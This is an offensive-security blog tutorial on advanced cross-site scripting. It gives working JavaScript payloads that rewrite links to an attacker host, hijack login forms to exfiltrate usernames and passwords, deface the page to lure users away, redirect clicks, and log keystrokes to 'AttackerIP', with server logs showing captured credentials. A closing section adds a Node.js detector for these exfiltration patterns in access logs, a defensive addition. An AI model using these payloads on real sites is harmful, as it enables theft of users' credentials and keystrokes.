Advanced XSS


Advanced XSS builds upon my previous post, Basic XSS.

Modifying HTML

  • Changing the main heading (the first h1 element) of the target page to New Title.
document.getElementsByTagName("h1")[0].innerHTML = "New Title";

  • Changing all links on the target page to point to our attacking host, serving up the malicious file evil.txt.
var links = document.getElementsByTagName("a");
for (var i = 0; i < links.length; i++)
    links[i].href = "http://AttackerIP/evil.txt";

Form Submission Hijacking

  • For the username and password variables we select the first form, indicated by forms[0].

  • We then select the first and second elements of said form, where elements[0] represents the username input field and elements[1] the password input field.

  • The data entered into these fields is then assigned to the respective variables.

  • Once the form is submitted by the victim our function InterceptForm is called: document.forms[0].onsubmit = InterceptForm;.

  • We then simply send ourselves the captured credentials by leveraging Image().src and setting the value to our own HTTP server.

function InterceptForm() {
    // Read the values of the first two inputs of the first form on the page
    var username = document.forms[0].elements[0].value;
    var password = document.forms[0].elements[1].value;
    // Exfiltrate them as query parameters of an image request to our HTTP server
    new Image().src = "http://AttackerIP/?username=" + username + "&password=" + password;
}
document.forms[0].onsubmit = InterceptForm;
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the credentials from our JavaScript payload 
... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -

Social Engineering

  • First we create the h2 element and input our new heading text, stating Website Under Construction.

  • Second, we create the h3 element and input our malicious redirect text Please visit

  • Upon clicking, the link will send the victim to a domain/malicious file under our control.

  • We want to keep our malicious domain as close to the target domain as possible, tricking the victim into believing the site is legitimately down and following our link.

  • Lastly, we append our h2 and h3 header elements to the page and remove the login form that was there originally.

var input = document.createElement("h2");
input.innerHTML = "Website Under Construction";

var link = document.createElement("h3");
link.innerHTML = "Please visit " + "".link('');

// Append the new headings and remove the original login form (first form on the page)
document.body.appendChild(input);
document.body.appendChild(link);
document.forms[0].parentNode.removeChild(document.forms[0]);


Before injection:

After injection:

Capturing Clicks

  • We declare a function CaughtClick, with a link to our malicious URL.

  • We then add an EventListener to the document body.

  • If the victim clicks anywhere on the page whilst browsing our target site, the event listener will ‘catch’ this click and run our CaughtClick function, sending the victim to a malicious site under our control.

  • For more information on JavaScript events, please click here.

function CaughtClick() {
    location.href = "http://AttackerIP/evil.txt";
}
// Capture-phase listener: fires for a click on any element in the body
document.body.addEventListener('click', CaughtClick, true);

Keylogging

  • We assign the onkeypress event to our function KeyLog.

  • The browser passes the keypress event to KeyLog as its input argument.

  • The key_pressed variable is assigned the Unicode value of the specific key pressed by the victim, converted into a character.

  • Finally, we send each value of key_pressed to our Python SimpleHTTPServer using Image().src.

document.onkeypress = function KeyLog(input) {
    // input.which holds the Unicode value of the key pressed
    var key_pressed = String.fromCharCode(input.which);
    new Image().src = "http://AttackerIP/?" + key_pressed;
};
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the keystrokes from our JavaScript payload 
... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /?  HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -
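As an added defender-side example (not code from the original post), the following Node.js check scans access-log lines in the format SimpleHTTPServer prints above, looking for the two exfiltration patterns shown on this page: credential-named query parameters (the form hijack) and bursts of single-character queries from one client (the keylogger). The client IPs, timestamps and the five-request threshold are constructed assumptions.

```javascript
const CRED_PARAMS = new Set(["username", "user", "password", "pass", "pwd", "token"]);
const KEYSTROKE_BURST = 5; // single-character queries from one client before flagging (assumed threshold)

// Parse one SimpleHTTPServer access-log line into { ip, path, query }, or null if it does not match.
function parseLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[[^\]]*\] "GET (\/\S*) HTTP\/[\d.]+" \d{3}/);
  if (!m) return null;
  const qIdx = m[2].indexOf("?");
  return {
    ip: m[1],
    path: qIdx === -1 ? m[2] : m[2].slice(0, qIdx),
    query: qIdx === -1 ? "" : m[2].slice(qIdx + 1),
  };
}

// Scan log lines and return { credentials: [...], keystrokeClients: [...] }.
function detectExfil(lines) {
  const findings = { credentials: [], keystrokeClients: [] };
  const singleCharHits = new Map(); // client IP -> count of "?x" requests
  for (const line of lines) {
    const req = parseLine(line);
    if (!req || !req.query) continue;
    const keys = [...new URLSearchParams(req.query).keys()];
    // Pattern 1: credential-named parameters in the query string (the form hijack above).
    if (keys.some((k) => CRED_PARAMS.has(k.toLowerCase()))) {
      findings.credentials.push({ ip: req.ip, path: req.path, params: keys });
    }
    // Pattern 2: the whole query is one character, raw or URL-encoded (the keylogger above).
    if (/^(%[0-9A-Fa-f]{2}|[^%&=])$/.test(req.query)) {
      singleCharHits.set(req.ip, (singleCharHits.get(req.ip) || 0) + 1);
    }
  }
  for (const [ip, n] of singleCharHits) {
    if (n >= KEYSTROKE_BURST) findings.keystrokeClients.push({ ip, requests: n });
  }
  return findings;
}

// Constructed sample log: one hijacked form submission and a keystroke burst from a second client.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2020 10:00:00] "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -',
  '10.0.0.9 - - [01/Jan/2020 10:00:01] "GET /index.html HTTP/1.1" 200 -',
  ...["v", "i", "c", "%20", "t"].map(
    (c) => `10.0.0.7 - - [01/Jan/2020 10:00:02] "GET /?${c} HTTP/1.1" 200 -`
  ),
];

console.log(JSON.stringify(detectExfil(SAMPLE_LOG), null, 2));
```

The same two patterns can be searched for in the logs of any external host that pages on the target site unexpectedly load images from, which is usually the first visible trace of this kind of payload.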